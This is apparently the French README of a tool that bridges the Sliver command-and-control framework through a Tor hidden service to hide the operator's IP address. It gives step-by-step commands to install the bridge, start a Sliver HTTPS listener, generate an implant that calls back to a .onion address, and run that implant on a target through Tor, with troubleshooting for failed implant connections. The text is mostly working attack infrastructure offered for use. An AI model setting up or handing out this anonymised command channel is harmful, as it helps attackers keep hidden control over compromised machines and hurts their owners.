
Pont de transport Tor pour Sliver C2 - commandement et contrôle anonyme
Pont de transport basé sur Tor pour Sliver C2. Crée un service caché et proxyfie le trafic vers votre serveur Sliver afin que votre adresse IP réelle ne soit jamais exposée.
Met en place un service caché Tor qui pointe vers un proxy HTTP local. Le proxy transmet tout au listener HTTPS de Sliver. Les implants se connectent via Tor, vous les contrôlez normalement via Sliver.
sliver server <---> proxy <---> tor hidden service <---> implant
:8443 :8080 xyz.onion (via tor)
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .
Démarrez Sliver avec un listener HTTPS :
sliver-client
sliver > https -L 127.0.0.1 -l 8443
Dans un autre terminal, démarrez le pont :
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443
La sortie affichera quelque chose comme :
[+] Tor started successfully!
[+] Hidden Service: http://abc123xyz.onion
[+] Bridge is READY!
Attendez l'adresse .onion, puis générez un implant :
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/implant
Exécutez l'implant sur la cible (nécessite Tor) :
HTTP_PROXY=socks5h://127.0.0.1:9050 ./implant
sliver-tor-bridge start [OPTIONS]
--sliver-port port https de sliver (défaut 8443)
--tor-port port socks de tor (défaut 9050)
--service-port port du service caché (défaut 80)
-c, --config chemin du fichier de configuration
Autres commandes :
sliver-tor-bridge status # vérifier si le service caché est en cours d'exécution
sliver-tor-bridge stop # nettoyer le répertoire du service caché
graph LR
Implant[Implant] -->|Tor Network| HS["Hidden Service (.onion)"]
HS -->|TCP :8080| Proxy["Bridge Proxy"]
Proxy -->|HTTPS :8443| Sliver["Sliver Server"]
Le pont se situe au milieu et relaie le trafic. Sliver pense recevoir des connexions HTTPS normales. L'implant pense parler à un serveur HTTP normal.
docker-compose up -d
docker-compose logs -f
pip install pytest
pytest tests/
sliver_tor_bridge/
cli.py # interface en ligne de commande
tor_manager.py # démarre Tor et crée le service caché
proxy.py # application Flask qui transmet à Sliver
config.py # gestion de la configuration
tor ne démarre pas : assurez-vous que le service système Tor est arrêté (sudo systemctl stop tor)
timeout de connexion : l'amorçage de Tor peut prendre 1 à 3 minutes, attendez 100 %
l'implant ne se connecte pas : assurez-vous que l'implant a accès à Tor (proxy socks sur 9050)
mit